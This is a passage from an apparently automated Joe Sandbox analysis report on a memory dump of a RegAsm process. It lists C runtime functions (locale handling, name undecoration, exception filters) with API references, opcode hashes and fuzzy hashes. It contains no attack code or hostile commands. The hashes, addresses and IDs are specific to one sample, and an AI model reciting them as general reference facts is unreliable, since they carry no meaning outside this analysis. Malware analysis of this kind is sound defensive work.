                                                                                                                                                                                                                                          • __aulldiv.LIBCMT ref: 004211CB
                                                                                                                                                                                                                                          • __aulldiv.LIBCMT ref: 00421290
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: __aulldiv
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3732870572-0
                                                                                                                                                                                                                                          • Opcode ID: 775faa42a7d552b4bdd8f93d78419dba34c0cdce023d96a9e4ae6639acb04b62
                                                                                                                                                                                                                                          • Instruction ID: b60834f5db5e1552b2b962e335da81e27a52cddb86fc4325a32176b2e4c97051
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 775faa42a7d552b4bdd8f93d78419dba34c0cdce023d96a9e4ae6639acb04b62
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 119170B5E00208AFEB14DFA4DC51FAEBBB9FB98714F208119F904BB2D4D77469018B65
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetLocaleInfoEx.KERNEL32(!x-sys-default-locale,20000001,00000000,00000002,?,?,0041F6CD,?,00000000), ref: 005406D3
                                                                                                                                                                                                                                          • FormatMessageA.KERNEL32(00001300,00000000,?,00000000,0041F6CD,00000000,00000000,?,?,0041F6CD,?,00000000), ref: 005406FA
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: FormatInfoLocaleMessage
                                                                                                                                                                                                                                          • String ID: !x-sys-default-locale
                                                                                                                                                                                                                                          • API String ID: 4235545615-2729719199
                                                                                                                                                                                                                                          • Opcode ID: 20989b94304a7defb237158a79aa7857ec4fe8fe38480a26bcda83b1aef4dd94
                                                                                                                                                                                                                                          • Instruction ID: 0e6d38edd00be859f6cf78a91d2be4bd9eac5d4685f0f32cae1fa79fc940a6ab
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 20989b94304a7defb237158a79aa7857ec4fe8fe38480a26bcda83b1aef4dd94
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 87F01C75610205FFEB049BD5DD0ADEF7BACEB49794B114015BA42D6180E2B0AE1097B0
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 0055AF41: GetLastError.KERNEL32(00000000,00553EAB,0055E4B5), ref: 0055AF45
                                                                                                                                                                                                                                            • Part of subcall function 0055AF41: SetLastError.KERNEL32(00000000,00000000,-000A8750,00000006,000000FF), ref: 0055AFE7
                                                                                                                                                                                                                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00561538
                                                                                                                                                                                                                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00561582
                                                                                                                                                                                                                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00561648
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: InfoLocale$ErrorLast
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 661929714-0
                                                                                                                                                                                                                                          • Opcode ID: 0b6528ed2727af672cad1082899e4a17bddceb69dc66016f5d56a2f29a8f21a4
                                                                                                                                                                                                                                          • Instruction ID: 70c1aa71be4d85ad4eb85358a0efa33ec9ce2a5a9ef07227a9ee6fcf816bf23e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0b6528ed2727af672cad1082899e4a17bddceb69dc66016f5d56a2f29a8f21a4
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4761AF75900A079FEB289F28CD86BBA7BB8FF04300F184179E906C7681EB34D985CB54
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • IsDebuggerPresent.KERNEL32(?,?,?,?,?,-000A8750), ref: 00553D88
                                                                                                                                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,-000A8750), ref: 00553D92
                                                                                                                                                                                                                                          • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,-000A8750), ref: 00553D9F
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3906539128-0
                                                                                                                                                                                                                                          • Opcode ID: 9a018ef6bc7f006d2d5b9871a2d5a14fba6324950fd96809d316f4df3e492099
                                                                                                                                                                                                                                          • Instruction ID: 5739e484f8b64ed1158f2adb511fc395c4ea5408645fc0710bc97b51debf59f2
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9a018ef6bc7f006d2d5b9871a2d5a14fba6324950fd96809d316f4df3e492099
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9131C174901229ABCB21DF68DC887CDBBB8BF08350F5041EAE80CA7290E7709F858F44
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 0055AF41: GetLastError.KERNEL32(00000000,00553EAB,0055E4B5), ref: 0055AF45
                                                                                                                                                                                                                                            • Part of subcall function 0055AF41: SetLastError.KERNEL32(00000000,00000000,-000A8750,00000006,000000FF), ref: 0055AFE7
                                                                                                                                                                                                                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0056178B
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ErrorLast$InfoLocale
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3736152602-0
                                                                                                                                                                                                                                          • Opcode ID: 12314db74dc1c780a7f071075102a6d7ad0d4ebf62ed34c4e0022942b85259d0
                                                                                                                                                                                                                                          • Instruction ID: 525e2d3deaa755b1367135d3ace304a61511168b89152ff51cc4dfa5dad0c6b6
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 12314db74dc1c780a7f071075102a6d7ad0d4ebf62ed34c4e0022942b85259d0
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1C219272600607ABDB289A25DC45A7B7BA8FF44711F14417AFD01D7241EB34ED45C754
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 0055AF41: GetLastError.KERNEL32(00000000,00553EAB,0055E4B5), ref: 0055AF45
                                                                                                                                                                                                                                            • Part of subcall function 0055AF41: SetLastError.KERNEL32(00000000,00000000,-000A8750,00000006,000000FF), ref: 0055AFE7
                                                                                                                                                                                                                                          • EnumSystemLocalesW.KERNEL32(005614E4,00000001,00000000,?,-00000050,?,00561B18,00000000,?,?,?,00000055,?), ref: 00561430
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2417226690-0
                                                                                                                                                                                                                                          • Opcode ID: 21ce9017f429e29c507f143db8d43db0c9d3451e451c8b9caf143c15956b3100
                                                                                                                                                                                                                                          • Instruction ID: 180f8680915f0e2750d0feb05cf390752d4532b0f2bdb17f0f286a0e4d458973
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 21ce9017f429e29c507f143db8d43db0c9d3451e451c8b9caf143c15956b3100
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F211253A200B015FDF289F39C8916BABB91FF84359B18442DE98787B40D771B842CB44
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 0055AF41: GetLastError.KERNEL32(00000000,00553EAB,0055E4B5), ref: 0055AF45
                                                                                                                                                                                                                                            • Part of subcall function 0055AF41: SetLastError.KERNEL32(00000000,00000000,-000A8750,00000006,000000FF), ref: 0055AFE7
                                                                                                                                                                                                                                          • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,005617E1,00000000,00000000,?), ref: 00561992
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ErrorLast$InfoLocale
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3736152602-0
                                                                                                                                                                                                                                          • Opcode ID: e6566e4f1a3b52a8953e7b7c61f10ab0633314299bf4cecfc55e456ca9af0dec
                                                                                                                                                                                                                                          • Instruction ID: 154d179d65967cd39def3a332d30e682769adac159f1085352af7702dae20319
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e6566e4f1a3b52a8953e7b7c61f10ab0633314299bf4cecfc55e456ca9af0dec
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F501DB32A009166BDF18562588157BA3F68FB40395F194469ED46E3180EE74ED41C798
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 0055AF41: GetLastError.KERNEL32(00000000,00553EAB,0055E4B5), ref: 0055AF45
                                                                                                                                                                                                                                            • Part of subcall function 0055AF41: SetLastError.KERNEL32(00000000,00000000,-000A8750,00000006,000000FF), ref: 0055AFE7
                                                                                                                                                                                                                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 00561320
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ErrorLast$InfoLocale
                                                                                                                                                                                                                                          • String ID: utf8
                                                                                                                                                                                                                                          • API String ID: 3736152602-905460609
                                                                                                                                                                                                                                          • Opcode ID: 1e0f790edf6219d0087bedd49c03608ce0d3e650134530e563ebd2cc61586877
                                                                                                                                                                                                                                          • Instruction ID: aee0512e19c8a49db782e0b08c784dc8b685f258d65ca6f674f0ee33791576ef
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1e0f790edf6219d0087bedd49c03608ce0d3e650134530e563ebd2cc61586877
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C6F0C832700206ABD714AB74DC49ABA37ECFF85315F1501BAF906EB241EA74AD049754
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 0055AF41: GetLastError.KERNEL32(00000000,00553EAB,0055E4B5), ref: 0055AF45
                                                                                                                                                                                                                                            • Part of subcall function 0055AF41: SetLastError.KERNEL32(00000000,00000000,-000A8750,00000006,000000FF), ref: 0055AFE7
                                                                                                                                                                                                                                          • EnumSystemLocalesW.KERNEL32(00561737,00000001,?,?,-00000050,?,00561AE0,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 005614A3
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2417226690-0
                                                                                                                                                                                                                                          • Opcode ID: 741fb869a1053948aadea0cbad9fff4b362ef6a6ed194ecfcb899d0c432c9017
                                                                                                                                                                                                                                          • Instruction ID: 60fae8a6d0401c9fe4353c39c12cf03f1eaf9966b8dd418d38ee2b8e43ff756d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 741fb869a1053948aadea0cbad9fff4b362ef6a6ed194ecfcb899d0c432c9017
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3EF046362007055FCB149F39DC81B7A7F94FF80328B08842DF9454B680CAB2AC02CA54
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00559A51: EnterCriticalSection.KERNEL32(-00173DB0,?,00555902,00000000,005898B0,0000000C,005558CA,?,?,0055D10C,?,?,0055B0E2,00000001,00000364,0041C3C8), ref: 00559A60
                                                                                                                                                                                                                                          • EnumSystemLocalesW.KERNEL32(0055B56B,00000001,00589B70,0000000C,0055B943,00000000), ref: 0055B5B0
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1272433827-0
                                                                                                                                                                                                                                          • Opcode ID: 298a0d326feddef51fa4531c83a59b35b28190c683d77284d9966ad9bc3db6ad
                                                                                                                                                                                                                                          • Instruction ID: a1966b68aeed02658dd9d22d9ee8b81625bd5ca2e6ebc5b528a783e4692361ab
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 298a0d326feddef51fa4531c83a59b35b28190c683d77284d9966ad9bc3db6ad
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FFF03C76A40205DFD704DF58E85AB5D7BA0FB54721F10411BE811A72A0DB758909DF40
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 0055AF41: GetLastError.KERNEL32(00000000,00553EAB,0055E4B5), ref: 0055AF45
                                                                                                                                                                                                                                            • Part of subcall function 0055AF41: SetLastError.KERNEL32(00000000,00000000,-000A8750,00000006,000000FF), ref: 0055AFE7
                                                                                                                                                                                                                                          • EnumSystemLocalesW.KERNEL32(005612CC,00000001,?,?,?,00561B3A,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 005613AA
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2417226690-0
                                                                                                                                                                                                                                          • Opcode ID: 60dce63610ef3a150b1960c8f744771e6eb579848d3b35c668cd4f5e1924079e
                                                                                                                                                                                                                                          • Instruction ID: 6fbf1db0d860dfe5b69b60246790b1693fd5e35598fd401bb204bb28dcf0b992
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 60dce63610ef3a150b1960c8f744771e6eb579848d3b35c668cd4f5e1924079e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 91F0E53A30024557CB049F39D85567A7F94FFC1710B0A4459EE06CB651D6719842C794
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,005579FC,?,20001004,00000000,00000002,?,?,00556FEE), ref: 0055BA7B
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: InfoLocale
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2299586839-0
                                                                                                                                                                                                                                          • Opcode ID: bb9429e0232fbbff0e4e3be30dc214aa290e8663941acf9757ef2ff556115542
                                                                                                                                                                                                                                          • Instruction ID: c060f1b78f71f7eb78c69f107a62cdac8244513631f35d7fac48146e687034f2
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bb9429e0232fbbff0e4e3be30dc214aa290e8663941acf9757ef2ff556115542
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1EE04F35900219BBDF126F60DC1DEAE3F16FF44761F104512FC4566221CB729925AA95
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • CryptReleaseContext.ADVAPI32(?,00000000,?,?,0051CE6B,?,?,0051D0F9,?,?,00000000), ref: 0051CDA7
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ContextCryptRelease
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 829835001-0
                                                                                                                                                                                                                                          • Opcode ID: f99aaac8c9758899443b23d47bd2e6f87f5fee543218b0c6a20bca957a8c697e
                                                                                                                                                                                                                                          • Instruction ID: 2a2373d077735e32addf59d9ae9e58c9926abfff3bf8d2f6bc61f1b82ef8659c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f99aaac8c9758899443b23d47bd2e6f87f5fee543218b0c6a20bca957a8c697e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 78D05E70544208EBC704CB88E844B69BBB9EB45300F100198E80457350C7725E00EA90
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetSystemTimeAsFileTime.KERNEL32(?), ref: 0042C65A
                                                                                                                                                                                                                                            • Part of subcall function 0042C630: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0042C645
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Time$FileSystemUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1518329722-0
                                                                                                                                                                                                                                          • Opcode ID: 0846384a7ef8ada146f4364a39d2aa150d6fe90e0a2e0f76f70be87aba7eb902
                                                                                                                                                                                                                                          • Instruction ID: 26212f6dd9c9889740eace36348083d601d478463fc9ebf136614ef56493588f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0846384a7ef8ada146f4364a39d2aa150d6fe90e0a2e0f76f70be87aba7eb902
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0DC012B5C1010CA78E00EBE4BC4A89DBB2C9610115F4006A5ED0983101F935A25D8BD2
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 1a58165032b6f387b3a28474570795e4e25dfc93a0902fae1b5fa62accefb4b4
                                                                                                                                                                                                                                          • Instruction ID: cd77543b30515fead899721cfa5598f148643e701e7b6ea9acc9c050cb6a9405
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1a58165032b6f387b3a28474570795e4e25dfc93a0902fae1b5fa62accefb4b4
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 00E06D74901608EFDB10DFA4E8087A9BBB4FB58301F505A5BEC0493391D3389988EB80
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: shared_ptr$operator+$Name::operator+Name::operator=
                                                                                                                                                                                                                                          • String ID: volatile$<unknown>$UNKNOWN$__int128$__int16$__int32$__int64$__int8$__w64 $auto$bool$char$char16_t$char32_t$char8_t$const$decltype(auto)$double$dV$float$int$long$long $short$signed $this $unsigned $void$volatile$wchar_t
                                                                                                                                                                                                                                          • API String ID: 1464150960-1494216725
                                                                                                                                                                                                                                          • Opcode ID: ac75876a071b2d59c407c2330918ee95437065eec806d2a68f1ef975a5941908
                                                                                                                                                                                                                                          • Instruction ID: 6d99804e3a8da7d5ea7344fbbeede2e4870af29eb28eb8129b335d5c7abf15d8
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ac75876a071b2d59c407c2330918ee95437065eec806d2a68f1ef975a5941908
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F2E139B5C0460ADBCB14DF94C49DAFEBFB8BB04308F20855AE512A7242E7B55B49CF91
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • DName::operator+.LIBCMT ref: 0054942A
                                                                                                                                                                                                                                          • UnDecorator::getSignedDimension.LIBCMT ref: 00549435
                                                                                                                                                                                                                                          • UnDecorator::getSignedDimension.LIBCMT ref: 00549521
                                                                                                                                                                                                                                          • UnDecorator::getSignedDimension.LIBCMT ref: 0054953E
                                                                                                                                                                                                                                          • UnDecorator::getSignedDimension.LIBCMT ref: 0054955B
                                                                                                                                                                                                                                          • DName::operator+.LIBCMT ref: 00549570
                                                                                                                                                                                                                                          • UnDecorator::getSignedDimension.LIBCMT ref: 0054958A
                                                                                                                                                                                                                                          • _swprintf.LIBCMTD ref: 00549604
                                                                                                                                                                                                                                          • DName::operator+.LIBCMT ref: 0054965F
                                                                                                                                                                                                                                            • Part of subcall function 00545497: DName::DName.LIBVCRUNTIME ref: 005454F5
                                                                                                                                                                                                                                          • DName::DName.LIBVCRUNTIME ref: 005496D6
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Decorator::getDimensionSigned$Name::operator+$NameName::$_swprintf
                                                                                                                                                                                                                                          • String ID: NULL$`generic-class-parameter-$`generic-method-parameter-$`template-type-parameter-$lambda$nullptr
                                                                                                                                                                                                                                          • API String ID: 138750261-2441609178
                                                                                                                                                                                                                                          • Opcode ID: 8a1952b18291c6209458bb4a13aa854f6d774381a99a8f7d3ed765806125377e
                                                                                                                                                                                                                                          • Instruction ID: 79b858ad9252b6762193080c1aa84ee5613355ddb00d8d47f0802fe59c1a2d6a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8a1952b18291c6209458bb4a13aa854f6d774381a99a8f7d3ed765806125377e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DC91A5B2D0410A9ACF14EFB4D95FAFF7F78BF9530CF200919E112A6186DA749A058B61
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • DName::operator+.LIBCMT ref: 005488C9
                                                                                                                                                                                                                                          • DName::operator+.LIBCMT ref: 00548A0C
                                                                                                                                                                                                                                            • Part of subcall function 005444DA: shared_ptr.LIBCMT ref: 005444F6
                                                                                                                                                                                                                                          • DName::operator+.LIBCMT ref: 005489B7
                                                                                                                                                                                                                                          • DName::operator+.LIBCMT ref: 00548A58
                                                                                                                                                                                                                                          • DName::operator+.LIBCMT ref: 00548A67
                                                                                                                                                                                                                                          • DName::operator+.LIBCMT ref: 00548B93
                                                                                                                                                                                                                                          • DName::operator=.LIBVCRUNTIME ref: 00548BD3
                                                                                                                                                                                                                                          • DName::DName.LIBVCRUNTIME ref: 00548BDD
                                                                                                                                                                                                                                          • DName::operator+.LIBCMT ref: 00548BFA
                                                                                                                                                                                                                                          • DName::operator+.LIBCMT ref: 00548C06
                                                                                                                                                                                                                                            • Part of subcall function 0054A0F8: Replicator::operator[].LIBCMT ref: 0054A135
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Name::operator+$NameName::Name::operator=Replicator::operator[]shared_ptr
                                                                                                                                                                                                                                          • String ID: `anonymous namespace'
                                                                                                                                                                                                                                          • API String ID: 1043660730-3062148218
                                                                                                                                                                                                                                          • Opcode ID: f0e404364c21831623b221b52700c3fa0ced215c7f50163083520117cbc2fdd5
                                                                                                                                                                                                                                          • Instruction ID: a56167a98a905c46dd22504de9dbf9ed21a87d1f1268e930c8451ea431c80cbe
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f0e404364c21831623b221b52700c3fa0ced215c7f50163083520117cbc2fdd5
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C9C18BB19002099FDB24DFA4C849BFEBFF4BB5A308F14445DE54AA7281EB749A49CF50
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • DName::operator+.LIBCMT ref: 00546D12
                                                                                                                                                                                                                                            • Part of subcall function 005444B8: DName::operator+=.LIBCMT ref: 005444CE
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Name::operator+Name::operator+=
                                                                                                                                                                                                                                          • String ID: \V$\V$`unknown ecsu'$class $coclass $cointerface $enum $struct $union
                                                                                                                                                                                                                                          • API String ID: 382699925-3114403028
                                                                                                                                                                                                                                          • Opcode ID: 44d04b42bd7f64a9fbdc2a737b1503d7bc291e2cb923117d01b19c19c51f0a78
                                                                                                                                                                                                                                          • Instruction ID: f35742d8d0e59c2c47aff01cf31279159e0d27da270b69ac7e3e9786b4597088
